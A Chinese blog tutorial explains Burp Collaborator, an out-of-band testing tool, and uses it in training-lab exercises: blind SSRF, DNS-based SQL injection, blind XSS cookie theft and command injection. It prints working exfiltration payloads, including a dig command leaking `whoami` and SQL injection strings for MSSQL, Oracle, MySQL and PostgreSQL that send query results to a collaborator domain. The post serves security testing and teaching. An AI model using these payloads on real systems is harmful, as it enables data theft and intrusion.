Burp Collaborator-带外工具

已于 2022-04-10 17:40:33 修改
阅读量1.6w 收藏 16
点赞数 4
分类专栏: 工具 文章标签: Burp collaborator 工具 带外技术
于 2022-02-27 23:06:48 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wang_624/article/details/123172519
版权

Burp Collaborator

什么是Burp Collaborator?

Burp Collaborator 是 OAST的产物,它可以帮你实现对响应不可见和异步的一个漏洞检测。

目前 Burp 发布的新版本中默认携带了 Burp Collaborator 模块

Burp Collaborator 原理

Burp Collaborator 模型 参考上文带外攻击模型

Burp Collaborator 有自己专用域名 burpcollaborator.net,类似于ceye平台,有一个权威DNS服务器,用户使用Collaborator模块时会给每一个用户会分配一个二级域名。

Burp Collaborator 配置

Burp Collaborator 只是一个客户端,我们可以使用 Burp 给我们配置的默认带外服务器,也可以使用自己私有的服务器。

Burp Collaborator 配置

可以选择使用默认的配置 外带服务器,也可以自己设置外带服务器

点击 Run health check 可以测试外带服务器服务是否正常

Burp Collaborator 使用

打开 Collaborator 客户端

使用 Client

使用 dig 查询 域名

dig `whoami`.7jr9gk6gtnstix33jp6181eu2l8cw1.burpcollaborator.net

查看Client返回的日志

可见,我们通过dig 查看DNS记录的方式,将whoami的命令携带发送到服务器。

Burp Collaborator 应用

使用Burp 提供的靶场,来介绍 Burp Collaborator的用法

工作原理

Burp Collaborator 生成唯一的域名,将它们以有效负载的形式发送到应用程序,并监视与这些域的任何交互。如果观察到来自应用程序的传入请求,那么就可以检测到对应的漏洞。

检测外部服务交互(SSRF)

SSRF : 服务器在加载外部URL时,没有进行严格的过滤,导致用户可以请求或者绕过过滤请求其他域资源或者对服务器所在内网进行未授权访问。

检测过程

  1. 应用程序通过获取URL的内容的操作,拿到我们提供的有效载荷,并以不安全的方式执行,
  2. 根据我们的有效载荷,它将首先对随机子域执行 DNS 查找,然后执行 HTTP 请求。
  3. Collaborator 服务器接 DNS 查找和 HTTP 请求,两种交互都包含 Brup 放入 Collaborator 的随机数据。
  4. Burp 轮询 Collaborator 服务器并询问 “你收到我的有效负载的任何交互了吗?”,然后 Collaborator 返回交互详细信息。
  5. Burp 在将交互信息返回到 Client 。

Burp靶场 -盲SSRF

将Burp Collaborator Client 的获取的域名 添加HTTP请求的 Referer位置 等待几秒 然后点击poll now 会看到应用程序启动的DNS 和HTTP交互

SQLi靶场 - DNSLog-SQL注入

SQL注入:用户输入的参数拼接到SQL语句中被执行,当输入的参数可控时,可以通过参数获取其他用户的数据。

常见数据库外带语法

MSSQL:declare @p varchar(1024);set @p=(select 查询语句);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"')

Oracle:SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual

MySQL:select LOAD_FILE('\\\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\\a')

PostgreSQL:create OR replace function f() returns void as $$ declare c text; declare p text; begin SELECT into p (SELECT YOUR-QUERY-HERE); c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net'''; execute c; END; $$ language plpgsql security definer; SELECT f();

我这里使用 sqli 的靶场演示一下利用 burp Collaborator 实现DNSLog注入

前提条件:secure_file_priv 为空,(如果非空,只能读取对应目录下的文件)

select 1,2,LOAD_FILE(concat('\\\\',database(),'~','xwxb0b0bnpm5bnjbo19apeivpmvfj4.burpcollaborator.net\\a')) --+

Burp靶场 - XSS 盲打cookie

跨站点脚本(也称为 XSS)是一种 Web 安全漏洞,允许攻击者破坏用户与易受攻击的应用程序的交互。它允许攻击者绕过同源策略,该策略旨在将不同的网站相互隔离。跨站点脚本漏洞通常允许攻击者伪装成受害者用户,执行用户能够执行的任何操作,并访问用户的任何数据。如果受害者用户在应用程序中具有特权访问权限,那么攻击者可能能够完全控制应用程序的所有功能和数据。

在 xss payload 中,添加自己burp collaborator 生成的域名

等待 管理员查看评论即可触发 xss payload 实现对cookie 的获取

Burp靶场 - 带外命令注入

操作系统命令注入(也称为 shell 注入)是一种 Web 安全漏洞,它允许攻击者在运行应用程序的服务器上执行任意操作系统 (OS) 命令,并且通常会完全破坏应用程序及其所有数据。很多时候,攻击者可以利用操作系统命令注入漏洞来破坏托管基础设施的其他部分,利用信任关系将攻击转向组织内的其他系统。

总结

还有更多用法,期待大家去发现,

一个小tips:多去看看官方文档,会发现更多神奇的用法。

微信公众号:石头安全

0zzie
关注
  • 4
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
《WEB安全渗透测试》(28)Burp Collaborator-dnslog外带技术
午夜安全
08-01 2498
1)打开BurpSuite,第一步选择“Projectoptions”,第二步选择“Misc”,第三步选择“UsethedefaultCollaboratorserver”(使用默认配置的外带服务器,如果想使用自己的服务器,可以在下面自由配置),第四步点击“Runhealthcheck..”测试外带服务器是否可以正常工作。这两个平台,他们是免费的DNSlog平台,我们利用它们可以监控DNS解析记录和HTTP访问记录,这对我们验证一些漏洞非常有帮助。...
使用Burp Collaborator验证无回显的RCE漏洞
大河之犬的博客
01-24 181
当应用程序容易受到命令注入攻击,但命令是异步执行时,就会发生异步操作系统命令注入漏洞。这意味着它对应用程序的响应没有明显影响Burp Collaborator 可以帮助您测试异步命令注入漏洞。可以使用 Burp 注入一个命令,该命令触发与 Burp Collaborator 服务器的带外网络交互。Burp 监视协作器服务器,以确定是否发生带外交互,从而确定命令是否已执行靶场地址。
SqlmapDnsCollaboratorBurp扩展,可​​让您将Burp Collaborator用作DNS服务器,以通过Sqlmap渗出数据
02-14
SqlmapDnsCollaborator SqlmapDnsCollaborator是一个Burp扩展,可​​让您使用零配置的Sqlmap执行DNS渗透。 您将不需要DNS服务器或公共IP,只需一台具有Sqlmap和Burp的计算机即可。 通常如何使用Sqlmap执行DNS渗透: 您设置了DNS服务器! 您在该服务器上运行Sqlmap,该服务器对易受攻击的目标执行一些SQL注入。 易受攻击的目标将包含有趣数据的DNS请求发送到您的DNS服务器。 DNS请求由Sqlmap解释。 如何使用Sqlmap和SqlmapDnsCollaborator执行DNS渗透: 您在计算机上打开Burp并启用SqlmapDnsCollaborator。 您在计算机上运行Sqlmap,这会对易受攻击的目标执行一些SQL注入。 易受攻击的目标将包含有趣数据的DNS请求发送到Burp Colla
Burp Collaborator:一种DNS隧道利用工具
Fly_鹏程万里
02-18 1633
DNS隧道简介 DNS隧道,顾名思义,是一种可被攻击者利用进行数据传输的通道。 对于大众而言,巧妙地利用DNS隧道可以绕过Wi-Fi登录限制实现免费上网,但实际上,DNS隧道可以作为内部受损主机的远程控制信道进而完成很多恶意操作,例如执行操作系统命令、文件传输,甚至是完整的IP隧道。但很少有组织会对DNS进行监控,其可能导致的恶意通信或数据泄漏的威胁也常常被低估。 DNS隧道原理示意简图...
推荐项目:自托管Burp Suite私有协作服务器
最新发布
gitblog_00066的博客
06-01 533
推荐项目:自托管Burp Suite私有协作服务器 项目地址:https://gitcode.com/putsi/privatecollaborator 在这个数字化安全日益重要的时代,Web应用的安全测试成为必不可少的一环,而Burp Suite是业内广泛使用的Web应用程序安全测试工具。现在,有了Private collaborator server这个开源项目,你可以轻松地在自己的Ubunt...
Burpsuite之Burp Collaborator模块介绍
weixin_30852419的博客
08-01 1143
Burp Collaborator.是从Burp suite v1.6.15版本添加的新功能,它几乎是一种全新的渗透测试方法。Burp Collaborator.会渐渐支持blind XSS,SSRF,asynchronous code injection等其他还未分类的漏洞类型。 本文主要介绍使用Burp Collaborator.对这几种类型漏洞进行探测。 概念:In-band a...
Burp Collaborator 使用总结
qq_50854662的博客
12-31 2910
0x00:使用原因 我们在做渗透测试的时候,经常会遇到这种情况,测试跨站可能有些功能插入恶意脚本后无法立即触发,例如提交反馈表单,需要等管理员打开查看提交信息时才会触发,或者是盲注跨站,盲打 XSS 这种。再例如 SSRF,如果程序不进行回显任何信息,而只提示你输入的是否合法,那么也无法直接判断程序存在 SSRF 漏洞,我们可以叫盲 SSRF。再例如 XXE,引入外部文件时,如果程序也不返回任何...
burp_collaborator_http_api:Burp Suite协作者HTTP API
05-16
burp_collaborator_http_api A burp extender that let you use burp collaborator server within http api 一个让你可以通过HTTP API调用burpcollaborator服务器的插件 听说你想用cloudeye,而又没有注册码? 听说你想用dnslog,而又嫌太麻烦? 听说你想用ceye,而又怕认证? 这个插件让你分分钟用上burp版本的dnslog. ##部署说明: 最简单的方式一:运行burp pro并安装即可。 这个方式使用的是burp官方的服务器 方式二:自建burp collaborator服务器,这样就能做到完全独立自主了。 这个参考官方文档: github上也有docker版的部署方法: ##接口说明: 生成payload: 获取payload的记录: 目前这个接口是一股脑的
BurpSuite-Collaborator插件介绍 附最新burp破解版地址
weixin_46137328的博客
02-17 3357
0x00:前情概述我们在做渗透测试的过程中发送完payload之后都能及时获得执行的结果吗?不一定。就比如说我们在留言处插入一条XSS语句“<script>alert(1)&...
asynchronous vulnerabilities using the Burp Collaborator client
07-07
Burp Collaborator工具Burp CollaboratorBurp Suite Professional中的一款功能,专门设计用于检测带外通信和跨域信息泄漏。它通过一个由Burp团队控制的服务器网络提供服务,这些服务器实现了多种网络协议,如...
BurpSuite手册-015-Burp Suite tools-logger
07-01
- **Collaborator Client (Professional)**:集成Burp Collaborator服务,用于检测间接漏洞。 - **DOM Invader**:检测DOM型跨站脚本(XSS)漏洞。 - **Clickbandit**:生成Clickjacking攻击。 - **Mobile ...
CollaboratorPlusPlus
04-15
CollaboratorPlusPlus NCC Group Plc作为开源发布-http: 由Corey Arthur开发, 此项目是在AGPL下发布的,请参阅LICENSE以获取更多信息。 从下载版本。 背景 该工具旨在扩展Burp Suite提供的现有Collaborator功能,提供许多生活质量功能,并实施身份验证机制以保护私人协作者的部署,同时仍与生成和轮询Collaborator的所有现有扩展兼容上下文。 CollaboratorPlusPlus充当Burp与已配置的Collaborator服务器之间的代理,从而允许捕获客户端使用的Collaborator上下文。 然后,CollaboratorPlusPlus可以在中央界面中存储和显示观察到的上下文及其检索到的交互。 此外,可以手动轮询旧的上下文,即使关闭了Collaborator客户端窗口之后,也可以检索交互。
基于Code_Collaborator和Review_board的代码审工具试用对比说明.pdf
11-23
基于Code_Collaborator和Review_board的代码审工具试用对比说明.pdf
使用 Burp Collaborator 的Image Tragick 漏洞利用工具_python_代码_下载
06-15
【标题】中的“使用 Burp Collaborator 的 Image Tragick 漏洞利用工具”指的是在信息安全领域中,通过Burp Suite的专业扩展——Burp Collaborator来检测和利用Image Tragick漏洞的一种技术实践。Image Tragick是...
BurpSuite手册-019-Burp Suite tools-mobile assistant
07-04
12. **Collaborator Client (Professional Edition)**:与Burp Collaborator服务器配合,用于检测跨域漏洞和其他依赖于网络环境的攻击。 13. **DOM Invader**:专门针对DOM型XSS漏洞的扫描工具。 14. **...
BurpSuite手册-030-Save my work.pdf
07-07
在保存项目副本时,系统会询问是否要包含Burp Collaborator的唯一标识符。这些标识符用于追踪与项目相关的协作交互。如果多个实例共享同一标识符,可能会导致协作问题的遗漏或错误报告。如果你不希望其他人在获取...
渗透测试神器--Burp Suite
无痕的博客
12-27 1846
渗透测试工具burpsuite的学习
burpsuite安全练兵场-客户端16】测试WebSockets安全漏洞-3个实验(全)
热门推荐
01-17 1万+
【BP靶场portswigger-客户端16测试WebSockets安全漏洞】3个实验-万文详细步骤
burp-loader-keygen
09-21
burp-loader-keygen是一个用于生成Burp Suite Pro许可证密钥的工具。您可以通过下载burp-loader-keygen.jar并运行它来生成密钥。具体步骤如下: 1. 确保您已经安装了Java环境。 2. 下载burp-loader-keygen.jar工具,并解压缩。 3. 右击burp-loader-keygen.jar,并选择使用Java(TM) Platform SE binary打开keygen。 4. 按照工具的指引,输入您的个人信息(如姓名、公司等),生成许可证密钥。 5. 将生成的许可证密钥应用到Burp Suite Pro软件中以激活。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值